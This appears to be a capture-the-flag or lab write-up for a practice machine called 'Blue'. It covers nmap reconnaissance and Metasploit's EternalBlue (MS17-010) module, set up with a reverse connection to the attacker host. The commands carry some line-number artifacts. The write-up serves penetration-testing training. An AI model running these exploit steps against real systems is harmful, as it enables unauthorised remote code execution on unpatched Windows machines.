Difficulty Level: ⭐
Blue is a machine with a vulnerability in the 445 protocol SMB. EternalBlue allows remote code execution that was discovered in [MS17-010]
Summary:
At the end of the writeup I'll give you a summary of the entire machine, in english and spanish 🥳.
IMPORTANT You must have a virtual machine or audit operating system with root privileges and an Internet connection..
Methodology to be used:
Eternal Blue is an exploit that was allegedly developed by the U.S. National Security Agency (NSA). This program was stolen and then leaked by "The Shadow Brokers". It was then used to execute one of the most damaging ransomware attacks in history, known as Wannacry. The eternal blue virus program was designed to exploit a vulnerability registered as CVE-2017-0144, which corresponds to a security flaw in Microsoft's Server Message Block protocol (SMB). The security patch for this eternal blue virus vulnerability, called MS17-010, was released in March 2017. The use of the eternal blue exploited mainly affected hospitals, police stations and, in general, organizations around the world.
Versions with MS17-010 CVE Versions
Lets start with the reconnaissance phase. Our IP is 10.8.42.68 and the target is 10.10.90.82
#POWERSHELL1ping -c 1 10.10.90.82 2
#POWERSHELL1nmap -sn 10.10.90.82 2
#POWERSHELL1sudo su 2
#POWERSHELL1nmap 10.10.90.82 -p- -sV -oN all_ports.nmap -Pn --min-rate 5000 2
ó
#POWERSHELL1sudo nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.90.82 -oG Escaneo 2
Output:
The 445/tcp for microsoft-ds Windows 7 port is open, this is the port that the vulnerability is going to be exploited.
#POWERSHELL1msfconsole 2 3> search ms17-010 4 5or 6 7> search eternalblue 8 9> use exploit/windows/smb/ms17_010_eternalblue 10 11or 12 13> use 0 14 15> show options 16
#POWERSHELL1> set RHOSTS 10.10.90.82 2> set LPORT 65000 3> set LHOST 10.8.42.68 4 5> run 6
#POWERSHELL1> search ms17-010 2
Mas adelante mostraré a realizar pruebas de penetración a diferentes sistemas en tu laboratorio.